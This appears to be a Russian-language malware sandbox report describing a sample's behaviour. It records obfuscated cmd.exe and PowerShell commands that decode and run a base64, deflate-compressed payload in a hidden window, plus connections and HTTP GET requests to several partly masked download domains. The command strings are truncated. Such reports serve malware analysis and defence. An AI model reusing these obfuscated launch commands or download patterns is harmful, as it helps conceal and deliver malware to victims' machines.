Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' <SYSTEM32>\CmD /c"sEt oGl= InvoKE-expResSioN( neW-oBjeCT IO.stReAmREadEr(( neW-oBjeCT Io.cOMPResSION.DEfLAteSTreAm([sySTem.iO.MEMORystrEAm] [coNVerT]::froMBAsE64sTRing( 'NZBdT4MwFED/Cg9Nug...
Сетевая активность
Подключается к
- 'ke#####artistmarket.com':80
- 'ca###as.com.br':80
- 'kr##r.ru':80
- 'sh###bazm.com':80
- 'sh###bazm.com':443
- 'an####jsmiech.com':80
- 'an####jsmiech.com':443
TCP
Запросы HTTP GET
- http://ke#####artistmarket.com/OaM1uBg
- http://ca###as.com.br/30A6rlp
- http://sh###bazm.com/v675zUP
- http://an####jsmiech.com/UZpCXUkk
Другие
- 'sh###bazm.com':443
- 'an####jsmiech.com':443
UDP
- DNS ASK ke#####artistmarket.com
- DNS ASK ca###as.com.br
- DNS ASK kr##r.ru
- DNS ASK sh###bazm.com
- DNS ASK an####jsmiech.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' <SYSTEM32>\CmD /c"sEt oGl= InvoKE-expResSioN( neW-oBjeCT IO.stReAmREadEr(( neW-oBjeCT Io.cOMPResSION.DEfLAteSTreAm([sySTem.iO.MEMORystrEAm] [coNVerT]::froMBAsE64sTRing( 'NZBdT4MwFED/Cg9Nug...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $Ds2 = [TYPe]( \"{2}{1}{0}\"-F 'MenT','On','Envir') ; ( &( \"{0}{1}\"-f 'g','ci') ( \"{1}{0}{3}{2}\" -f 'AR','v','blE:eX*xT','IA' ) ).\"vaL`UE\".\"iNVoKEC`o`MMand\".\"INvoKE`S`crI`pT\"...
